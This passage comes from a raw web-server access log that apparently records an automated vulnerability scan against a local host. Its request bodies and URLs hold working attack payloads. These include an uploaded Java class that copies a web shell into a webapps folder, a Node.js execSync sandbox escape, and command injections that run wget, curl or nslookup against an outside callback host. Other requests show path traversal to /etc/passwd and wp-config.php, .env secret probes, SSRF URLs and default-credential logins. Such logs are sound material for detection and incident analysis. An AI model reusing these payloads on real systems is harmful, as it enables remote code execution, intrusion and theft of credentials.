name=\x22methodToCall\x22\x0D\x0A\x0D\x0Aunspecified\x0D\x0A--43992a07d9a30213782780204a9f032b\x0D\x0AContent-Disposition: form-data; name=\x22Save\x22\x0D\x0A\x0D\x0Ayes\x0D\x0A--43992a07d9a30213782780204a9f032b\x0D\x0AContent-Disposition: form-data; name=\x22form\x22\x0D\x0A\x0D\x0Asmartcard\x0D\x0A--43992a07d9a30213782780204a9f032b\x0D\x0AContent-Disposition: form-data; name=\x22operation\x22\x0D\x0A\x0D\x0AAdd\x0D\x0A--43992a07d9a30213782780204a9f032b\x0D\x0AContent-Disposition: form-data; name=\x22CERTIFICATE_PATH\x22; filename=\x22Si.class\x22\x0D\x0A\x0D\x0A\xCA\xFE\xBA\xBE\x00\x00\x004\x00(\x0D\x0A\x00\x0C\x00\x16\x0D\x0A\x00\x17\x00\x18\x07\x00\x19\x08\x00\x1A\x08\x00\x1B\x08\x00\x1C\x08\x00\x1D\x08\x00\x1E\x0D\x0A\x00\x17\x00\x1F\x07\x00 \x07\x00!\x07\x00\x22\x01\x00\x06\x01\x00\x03()V\x01\x00\x04Code\x01\x00\x0FLineNumberTable\x01\x00\x08\x01\x00\x0D\x0AStackMapTable\x07\x00 \x01\x00\x0D\x0ASourceFile\x01\x00\x07Si.java\x0C\x00\x0D\x0A\x00\x0E\x07\x00#\x0C\x00$\x00%\x01\x00\x10java/lang/String\x01\x00\x03cmd\x01\x00\x02/c\x01\x00\x04copy\x01\x00\x06ws.jsp\x01\x00*..\x5Cwebapps\x5Cadssp\x5Chelp\x5Cadmin-guide\x5Ctest.jsp\x0C\x00&\x00'\x01\x00\x13java/io/IOException\x01\x00\x02Si\x01\x00\x10java/lang/Object\x01\x00\x11java/lang/Runtime\x01\x00\x0D\x0AgetRuntime\x01\x00\x15()Ljava/lang/Runtime;\x01\x00\x04exec\x01\x00(([Ljava/lang/String;)Ljava/lang/Process;\x00!\x00\x0B\x00\x0C\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0D\x0A\x00\x0E\x00\x01\x00\x0F\x00\x00\x00\x1D\x00\x01\x00\x01\x00\x00\x00\x05*\xB7\x00\x01\xB1\x00\x00\x00\x01\x00\x10\x00\x00\x00\x06\x00\x01\x00\x00\x00\x02\x00\x08\x00\x11\x00\x0E\x00\x01\x00\x0F\x00\x00\x00d\x00\x05\x00\x02\x00\x00\x00+\xB8\x00\x02K*\x08\xBD\x00\x03Y\x03\x12\x04SY\x04\x12\x05SY\x05\x12\x06SY\x06\x12\x07SY\x07\x12\x08S\xB6\x00\x09L\xA7\x00\x04K\xB1\x00\x01\x00\x00\x00&\x00)\x00\x0D\x0A\x00\x02\x00\x10\x00\x00\x00\x12\x00\x04\x00\x00\x00\x05\x00\x04\x00\x06\x00&\x00\x07\x00*\x00\x08\x00\x12\x00\x00\x00\x07\x00\x02i\x07\x00\x13\x00\x00\x01\x00\x14\x00\x00\x00\x02\x00\x15\x0D\x0A--43992a07d9a30213782780204a9f032b--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /./RestAPI/LogonCustomization HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"username=admin&password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /hub/login?next= HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.production.local HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"methodToCall=openSSLTool&action=generateCSR&KEY_LENGTH=1024+-providerclass+Si+-providerpath+%22..%5Cbin%22","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /./RestAPI/Connection HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"username=jovyan&password=jupyter","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /hub/login?next= HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.local HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /help/admin-guide/test.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /js/../../../../../../../../etc/passwd%00.jpg HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logon.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET .//WEB-INF/weblogic.xml HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"-", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET .//WEB-INF/web.xml HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"-", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.example HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?pp=env HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/simple-file-list/includes/ee-downloader.php?eeFile=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.stage HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/GetSrc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/ad-widget/views/modal/?step=../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.live HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/GetDevice HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env_1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"document=++++++++++++%28%28%29+%3D%3E+%7B%0A++++++++const+process+%3D+clearImmediate.constructor%28%22return+process%3B%22%29%28%29%3B%0A++++++++const+result+%3D+process.mainModule.require%28%22child_process%22%29.execSync%28%22id+%3E+build%2Fcss%2F297MFgrOLcZ1gNVJZcrjXIpKe4I.css%22%29%3B%0A++++++++console.log%28%22Result%3A+%22+%2B+result%29%3B%0A++++++++return+true%3B%0A++++%7D%29%28%29++++++++","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /checkValid HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=rvm_import_regions&nonce=5&rvm_mbe_post_id=1&rvm_upload_regions_file_path=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.old HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /public/css/297MFgrOLcZ1gNVJZcrjXIpKe4I.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ovirt-engine/userportal/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env_sample HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"userName=admin&password=123456","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /xxl-job-admin/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"{\x0D\x0A \x22ID\x22: \x22297MFghlxDIEJ3mtSOzfEm82Bqh\x22,\x0D\x0A \x22Name\x22: \x22297MFghlxDIEJ3mtSOzfEm82Bqh\x22,\x0D\x0A \x22Address\x22: \x22127.0.0.1\x22,\x0D\x0A \x22Port\x22: 80,\x0D\x0A \x22check\x22: {\x0D\x0A \x22script\x22: \x22nslookup c9v8gc8smpv8b0ng0t00by3ngyyeq1wic.oast.online\x22,\x0D\x0A \x22interval\x22: \x2210s\x22,\x0D\x0A \x22Timeout\x22: \x2286400s\x22\x0D\x0A }\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /v1/agent/service/register HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webclient/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/qards/html2canvasproxy.php?url=https://c9v8gc8smpv8b0ng0t00x43se9foujuas.oast.online HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"action=ucmm_mc_api&apiKey=-c9v8gc8smpv8b0ng0t00kmiikdcbprozr.oast.online%2Ftest%2Ftest%2Ftest%3Fkey1%3Dval1%26dummy%3D","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"FVttq3Bu","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /functionRouter HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ovirt-engine/webadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"{\x0D\x0A \x22type\x22:\x22bulk\x22,\x0D\x0A \x22args\x22:[\x0D\x0A {\x0D\x0A \x22type\x22:\x22add_remote_schema\x22,\x0D\x0A \x22args\x22:{\x0D\x0A \x22name\x22:\x22test\x22,\x0D\x0A \x22definition\x22:{\x0D\x0A \x22url\x22:\x22https://c9v8gc8smpv8b0ng0t00bfq9xpk34yguo.oast.online\x22,\x0D\x0A \x22headers\x22:[\x0D\x0A ],\x0D\x0A \x22timeout_seconds\x22:60,\x0D\x0A \x22forward_client_headers\x22:true\x0D\x0A }\x0D\x0A }\x0D\x0A }\x0D\x0A ]\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/query HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth/realms/master/protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=http://c9v8gc8smpv8b0ng0t00kduckto1r9rn6.oast.online/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /xmlpserver/ReportTemplateService.xls HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"submitId=debug&debugCmd=wget+http://c9v8gc8smpv8b0ng0t00xon7bqjoang76.oast.online&submitEnd=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login.htm HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"c9v8gc8smpv8b0ng0t00doem8gmfjtyoh.oast.online","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.046","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"\x0D\x0A pingback.ping\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A http://c9v8gc8smpv8b0ng0t00idquw3cd7fqoc.oast.online\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A http://127.0.0.1/?p=1\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /xmlrpc.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"target_addr=\x221.1.1.1+`wget+http%3A%2F%2Fc9v8gc8smpv8b0ng0t001qo9k789t5fo8.oast.online%2F`\x22&waninf=127.0.0.1\x22","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /boaform/admin/formTracert HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.054","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"http://127.0.0.1/diag_ping_admin_en.asp", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?plot=;wget%20http://c9v8gc8smpv8b0ng0t00mkw3bm8ejq7w4.oast.online HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"file_transfer=new&dir=%27Pa_Noteexpr%20curl%2bhttp%3a//c9v8gc8smpv8b0ng0t00iax6nzma9niz8.oast.onlinePa_Note%27","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/file_transfer.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /proxy.stream?origin=http://c9v8gc8smpv8b0ng0t003bhabnxdnmgcz.oast.online HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/sharelinks/1.0/link?url=https://c9v8gc8smpv8b0ng0t0016k84iy93qami.oast.online/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget http://c9v8gc8smpv8b0ng0t00jsrmd43foytnj.oast.online`","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/system_mgr.cgi? HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/script?command=|%20nslookup%20c9v8gc8smpv8b0ng0t00zidccih8dhdnf.oast.online HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adm/krgourl.php?DOCUMENT_ROOT=http://c9v8gc8smpv8b0ng0t00ugisioisgi1fh.oast.online HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /interlib/report/ShowImage?localPath=etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET 